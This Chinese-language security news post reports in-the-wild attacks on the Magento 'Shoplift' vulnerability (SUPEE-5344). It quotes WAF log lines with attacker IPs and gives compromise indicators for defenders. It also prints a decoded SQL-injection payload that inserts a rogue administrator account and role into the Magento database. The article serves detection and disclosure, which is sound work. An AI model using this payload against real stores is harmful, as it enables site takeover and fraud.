ddddd

 

前几天我们报道了Magento远程代码执行漏洞分析报告 (SUPEE-5344) 现在CheckPoint安全团队放出了漏洞利用(EXP)的部分细节。

漏洞利用视频

视频证明了漏洞的有效性,视频里面安全研究员利用一个Magento网站越权为自己加了一张优惠券:

 

当然,这是一个简单的例子,该漏洞可以有更多的玩法。

日志中发现大量攻击请求

正如大家所预料,国外黑客已经利用这个漏洞EXP在遍地撒网了。在漏洞披露后,我们通过WAF日志看到了不少对这个漏洞进行扫描的日志:

62.76.177.179 – – [23/Apr/2015:00:45:44 -0400] "POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1" 403 1880 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36"
185.22.232.218 – – [22/Apr/2015:00:42:38 -0400] "POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1" 200 2211 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"

 

 

 

日志里所有的攻击来自两个IP:62.76.177.179和185.22.232.218,如果你在日志里发现这两个IP的话,估计你不幸地遭受过这个组织的扫描攻击。

攻击分析

我们小组捕获并分析了他们EXP,从现有的信息来看,他们只是试图在Magento数据库里创建一个admin用户,很明显他们还会进行后续工作来接管被黑的网站,被解密的exp部分信息如下:

 

popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);
SET @SALT = "rp";
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '123') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname',"[email protected]",'ypwq',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = 'ypwq'),'Firstname'); –

 

 

代码所利用的是SQL注入,往网站数据库里插入了新的admin_user。如果你怀疑自己被黑了,你可以查查你的网站数据库里有没有多出defaultmanager或者vpwq两个用户名,这两个用户名是该团伙所具备的攻击特征之一。

在这里我们隐藏了部分细节和完整的攻击负载(Payload),因为这样能避免部分新手黑客直接复制代码,轻易地拿去批量黑站。但是高水平的黑客组织应该已经开发出漏洞利用程序,而且已经开始没日没夜地扫描和入侵。

 

 

原文Magento Shoplift (SUPEE-5344) Exploits in the Wild  安全脉搏 Expl0r3r 整理发布

源链接

Hacking more

...